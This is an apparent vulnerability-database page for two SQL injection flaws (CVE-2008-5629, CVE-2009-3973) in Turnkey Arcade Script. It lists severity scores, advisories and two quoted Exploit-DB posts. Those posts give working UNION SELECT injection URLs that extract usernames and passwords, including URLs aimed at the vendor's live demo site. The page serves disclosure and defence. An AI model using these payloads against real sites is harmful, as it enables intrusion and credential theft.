CVE-2008-5629
published 2008-12-17
CVE-2008-5629: SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a play…
Priority P3 · 40 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS
0.98%
57.8th percentile
SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a play action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| turnkeyarcade | turnkey_arcade_script | — | — |
GHSA
GHSA-2xmq-j92f-3mrq: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-17
CVE-2008-5629 [HIGH] CWE-89 GHSA-2xmq-j92f-3mrq: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a play action.
GHSA
GHSA-7qmq-m34q-87h4: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3973 [HIGH] CWE-89 GHSA-7qmq-m34q-87h4: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Turnkey Arcade Script allows remote attackers to execute arbitrary SQL commands via the id parameter in a browse action, a different vector than CVE-2008-5629.
No detection rules found.
Exploit-DB
Turnkey Arcade Script - SQL Injection (2)
exploitdb·2009-08-25
CVE-2009-3973 Turnkey Arcade Script - SQL Injection (2)
---
## Hackteach.OrG ##
[»] ~ Note : Hacker R0x Lamerz Sux !
[»] Arcad site Script ]
[»] Gr44tz to: [ All member Hackteach.org/cc - Str0ke - sp3x ]
[»] Fuck To : [ Anti-trust << Big Big Big Lamer << ]
########################################################################
===[ Exploit SQL ]===
[»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
[»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
Author: Red-D3v1L <-
#######################################
Exploit-DB
Turnkey Arcade Script - SQL Injection (1)
exploitdb·2008-11-27
CVE-2009-3973 Turnkey Arcade Script - SQL Injection (1)
---
----------------Mor0ccan Nightmares----------------
Script: Turnkey Arcade Script-
Site: http://www.turnkeyarcade.com-
Author: The_5p3ctrum -
Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
---
Ex:
---
http://localhost/index.php?action=play&id=[sql]
http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users
exploit:
http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users
Demo:
http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users
Greetz:
Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...
# milw0rm.com
No writeups or analysis indexed.
http://secunia.com/advisories/32890
http://www.securityfocus.com/bid/32511
https://exchange.xforce.ibmcloud.com/vulnerabilities/46935
https://www.exploit-db.com/exploits/7256
2008-12-17
Published